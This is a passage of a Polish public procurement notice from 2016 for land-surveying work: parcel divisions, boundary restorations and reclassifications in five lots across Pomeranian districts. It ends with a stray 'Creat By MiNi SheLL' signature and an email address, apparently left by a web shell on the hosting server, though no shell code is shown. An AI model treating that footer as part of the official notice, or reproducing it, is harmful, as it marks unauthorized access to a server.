a) składając ofertę na zadanie 1, 2 i 4 Wykonawca powinien przedstawić w wykazie co najmniej 6 podziałów nieruchomości rolnych  powyżej 5 ha z podaniem przedmiotu (nr KERG,  obrębu i numeru działki), dat wykonania i podmiotów,
b) składając ofertę na zadanie 3 i 5 Wykonawca powinien przedstawić w wykazie co najmniej 2 podziały nieruchomości rolnej powyżej 10 ha z podaniem przedmiotu (nr KERG, obrębu i numeru działki), dat wykonania i podmiotów.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Oferta powinna składać się w szczególności z:
1) formularza ofertowego, sporządzonego na wzorze zgodnym w treści z załącznikiem nr 1 do SIWZ,
2) dokumentów wymienionych w Części III ust. 1 SIWZ,
3) pełnomocnictwa (jeżeli umocowanie osoby wskazanej w ofercie nie wynika z dokumentów rejestrowych  wpisu do ewidencji działalności gospodarczej, wypisu z KRS), 
4) pełnomocnictwa dla lidera konsorcjum (jeśli oferta składana jest przez wykonawców wspólnie ubiegających się o udzielenie zamówienia),
5) zobowiązania podmiotu trzeciego (jeśli dotyczy),
6) oświadczenie na druku zgodnym w treści z załącznikiem nr 8  jeżeli Wykonawca chce uzyskać punkty w kryterium Kwalifikacje personelu kluczowego.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Kwalifikacje personelu kluczowego</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zamawiający dopuszcza możliwość zmiany umowy w sytuacji konieczności przedłużenia terminu wykonania usług w przypadku wykazania przez Wykonawcę dokumentami urzędowymi lub dokumentami złożonymi w urzędzie, następujących okolicznościach:
a)konieczność pozyskania przez wykonawcę dodatkowych uzgodnień lub decyzji właściwych organów nie przewidzianych w zamówieniu. 
Przedłużenie terminu następuje na pisemny wniosek Wykonawcy złożony wraz ze sprawozdaniem i harmonogramem wykonanych czynności faktycznych i prawnych w siedzibie Zamawiającego przed upływem terminu wykonania pracy, pod warunkiem wyrażenia zgody przez Zamawiającego w formie pisemnej.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 15/11/2016, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>ZADANIE 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>polegające na:
1) podziale działki nr 89/17 o pow. 0,5006 ha położonej w obrębie Kiełpin Gm. Człuchów, pow. człuchowski na dwie działki;
2) podziale działki nr 249/2 o pow. 31,3278 ha położonej w obrębie Lisewo Gm. Przechlewo, pow. człuchowski na trzy działki;
3) wznowienie granic działki nr 500/7 o pow. 13,8215 ha położonej w obrębie Kiełpin Gm. Człuchów, pow. człuchowski;
4) wydzielenie z działki nr 363/1 o pow. 1,0800 ha położonej w obrębie Męcikał Gm. Brusy, pow. chojnicki użytku w stanowiącego wody płynące;
5)wydzielenie z działki nr 364 o pow. 0,1500 ha położonej w obrębie Męcikał Gm. Brusy, pow. chojnicki użytku w stanowiącego wody płynące;
6)wydzielenie z działki nr 363/3 o pow. 0,0700 ha położonej w obrębie Męcikał Gm. Brusy, pow. chojnicki użytku w stanowiącego wody płynące;
7)wydzielenie z działki nr 363/2 o pow. 0,0900 ha położonej w obrębie Męcikał Gm. Brusy, pow. chojnicki użytku w stanowiącego wody płynące;
8)wydzielenie z działki nr 196/6 o pow. 0,5598 ha położonej w obrębie Korne Gm. Kościerzyna, pow. kościerski użytku w stanowiącego wody płynące;
9)wydzielenie z działki nr 290/1 o pow. 10,9620 ha położonej w obrębie Jęczniki Wielkie Gm. Człuchów, pow. człuchowski działki poznaczonej pod ścieżkę  pieszo  rowerową;
10)wznowienie granic  działki nr 220/1 o pow. 0,1098 ha położonej w obrębie Pawłówko Gm. Przechlewo, pow. człuchowski;
11)wydzielenie z działki nr 306/14 o pow. 9,6137 ha położonej w obrębie Jęczniki Wielkie Gm. Człuchów, pow. człuchowski działki poznaczonej pod ścieżkę  pieszo  rowerową.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71250000-5, 71251000-2,
                    71355000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 150<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Kwalifikacje personelu kluczowego</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>ZADANIE 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>polegające na:
1) zmianie klasyfikacji użytków Br-RIVb, Br-PsIV o łącznej pow. 0,8800 ha znajdujących  się na działce nr 80 położonej w obrębie Redęcin gmina Słupsk powiat słupski na aktualny użytek;
2)zmianie klasyfikacji użytku Br-RV o  pow. 0,1400 ha znajdującego się na działce nr 97/5 położonego w obrębie Redęcin gmina Słupsk powiat słupski na aktualny użytek;
3)zmianie klasyfikacji użytku Br-RIVa o  pow. 0,5400 ha znajdującego się na działce nr 108/5 położonego w obrębie Redęcin gmina Słupsk powiat słupski na aktualny użytek;
4)zmianie klasyfikacji użytku Br-RIIIa o  pow. 1,01 ha znajdującego się na działce nr 56/1 położonego w obrębie Sycewice gmina Słupsk powiat słupski na aktualny użytek;
5)zmianie klasyfikacji użytku dr o  pow. 0,0700 ha znajdującego się na działce nr 266 położonego w obrębie Redęcin gmina Słupsk powiat słupski na aktualny użytek;
6)zmianie klasyfikacji użytku dr o  pow. 0,6500 ha znajdującego się na działce nr 267/1  położonego w obrębie Redęcin gmina Słupsk powiat słupski na aktualny użytek;
7)podziale działki nr 84 o pow. 39,96 ha położonej w obrębie Redęcin gmina Słupsk powiat słupski na trzy działki;
8)podziale działki nr 108/5 o pow. 49,84 ha położonej w obrębie Redęcin gmina Słupsk powiat słupski na trzy działki;
9)podziale działki nr 56/1 o pow. 97/61 ha położonej w obrębie Sycewice gmina Kobylnica powiat słupski na trzy działki;
10)podziale działki nr 14 o pow. 18,43 ha położonej w obrębie Sycewice gmina Kobylnica powiat słupski na  trzy działki;
11)podziale działki nr 15 o pow. 6,84 ha położonej w obrębie Sycewice gmina Kobylnica powiat słupski na trzy działki;
12)wznowieniu granic działki nr 63 o pow. 0,24 ha położonej w obrębie Sycewice gmina Kobylnica powiat słupski;
13)wznowieniu granic działki nr 64 o pow. 0,15 ha położonej w obrębie Sycewice gmina Kobylnica powiat słupski;
14)podziale działki nr 20 o pow. 1,62 ha położonej w obrębie Wiszno gmina Damnica powiat słupski na dwie działki;
15)podziale działki nr 101/28 o pow. 0,1371 ha położonej w obrębie Dobrzęcino gmina Kobylnica powiat słupski na trzy działki;
16)podziale działki nr 101/29 o pow. 0,0616 ha położonej w obrębie Dobrzęcino gmina Kobylnica powiat słupski na dwie działki;
17)podziale działki nr 101/37 o pow. 0,0637 ha położonej w obrębie Dobrzęcino gmina Kobylnica powiat słupski na dwie działki;
18)zmianie klasyfikacji użytku Br-RV o  pow. 0,1400 ha znajdującego się na działce nr 97/5 położonego w obrębie Redęcin gmina Słupsk powiat słupski na aktualny użytek.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71250000-5, 71251000-2,
                    71355000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 150<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Kwalifikacje personelu kluczowego</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>ZADANIE 3<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>polegające na:
1) podziale działki nr 19/2 o pow. 60,4472 ha położonej w obrębie Górki gmina Kwidzyn pow. kwidzyński na trzy działki;
2)podziale działki nr 17/22 o pow. 37,3557 ha położonej w obrębie Górki gmina Kwidzyn pow. kwidzyński na dwie działki;
3)wydzieleniu z  działki nr 8/34 o pow. 1,2413 ha położonej w obrębie Tragamin gmina Malbork pow. malborski przepompowni wraz z podziemnym betonowym zbiornikiem stanowiącym własność Gminy Malbork;
4)aktualizacji mapy sytuacyjno- wysokościowej oraz ewidencji gruntów działki 42/20 położonej w obrębie Nowy Staw gmina Nowy Staw pow. malborski;
5)podziale działki nr 2/58 o pow. 0,1441 ha położonej w obrębie Pronie gmina Stary Dzierzgoń pow. Sztumski na  trzy działki.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71250000-5, 71251000-2,
                    71355000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 150<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Kwalifikacje personelu kluczowego</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>ZADANIE 4<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>polegające na:
1)podziale działki nr 123/2 o pow. 2,95 ha położonej w obrębie Węgorzynko Gm.Miastko, pow. bytowski  na dziewięć działek;
2)podziale działki nr 21/49 o pow. 1,1929 ha położonej w obrębie Suchorze Gm. Trzebielino, pow. bytowski na cztery działki;
3)podziale działki nr 219 o pow. 0,53 ha położonej w obrębie Gostkowo  Gm. Bytów, pow. bytowski na trzy działki;
4)wydzieleniu z działki nr 208 o pow. 1,4100 ha położonej w obrębie Kołczygłowy Gm. Kołczygłowy , pow. bytowski jednej działki stanowiącej poszerzenie drogi;
5)wydzieleniu z działki nr 240/2 o pow. 0,2600 ha położonej w obrębie Kołczygłowy Gm. Kołczygłowy , pow. bytowski jednej działki stanowiącej poszerzenie drogi;
6)podziale działki nr 162 o pow. 0,05 ha położonej w obrębie Rokitki Gm. Czarna Dąbrówka, pow. bytowski na dwie działki zgodnie z planem zagospodarowania przestrzennego oraz ustalenie linii brzegu z działką 99;
7)wydzieleniu z działki nr 143/3 o pow. 0,5000 ha położonej w obrębie Niezabyszewo Gm. Bytów, pow. bytowski jednej działki stanowiącej poszerzenie drogi;
8)wznowieniu granic  działki nr 92/2 o pow. 1,14 ha położonej w obrębie Rokitki Gm. Czarna Dąbrówka, pow. bytowski;
9)wznowieniu granic  działki nr 61 o pow. 0,0706 ha położonej w obrębie Barnowo Gm. Kołczygłowy, pow. bytowski;
10)wznowieniu granic  działki nr 413/1 o pow. 0,46 ha położonej w obrębie Gostkowo Gm. Bytów, pow. bytowski na odcinku z wodą płynącą oznaczona jako działka 396;
11)wznowieniu granic  działki nr 354 o pow. 0,93 ha położonej w obrębie Borzytuchom Gm. Borzytuchom, pow. bytowski na odcinku z wodą płynącą oznaczona jako działka 522/1
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71250000-5, 71251000-2,
                    71355000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 150<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>ifikacje personelu kluczowego</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>ZADANIE 5<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>polegające na:
1) podziale działki nr 28/1 o pow. 50,5255 ha położonej w obrębie Mirowo Gm. Skarszewy, pow. starogardzki na dwie  działki;
2)podziale działki nr 30/26 o pow. 22,2978 ha położonej w obrębie Mirowo Gm. Skarszewy, pow. starogardzki na dwie działki;
3) podziale działki nr 47/23 o pow. 18,9168 ha położonej w obrębie Mirowo Gm. Skarszewy, pow. starogardzki na dwie działki;
4) podziale działki nr 56/10 o pow. 71/5370 ha położonej w obrębie Mirowo Gm. Skarszewy, pow. starogardzki na dwie działki;
5)przygotowaniu projektu podziału około 70 działek przeznaczonych pod ogródki działkowe wraz z ich stabilizacją palikami na działkach nr 20/56, 20/53, 65/1 240/2 o łącznej pow. 3,8632 ha położonych w obrębie Jabłowo Gm. Starogard gdański , pow. starogardzki.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71250000-5, 71251000-2,
                    71355000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 150<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Kwalifikacje personelu kluczowego</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com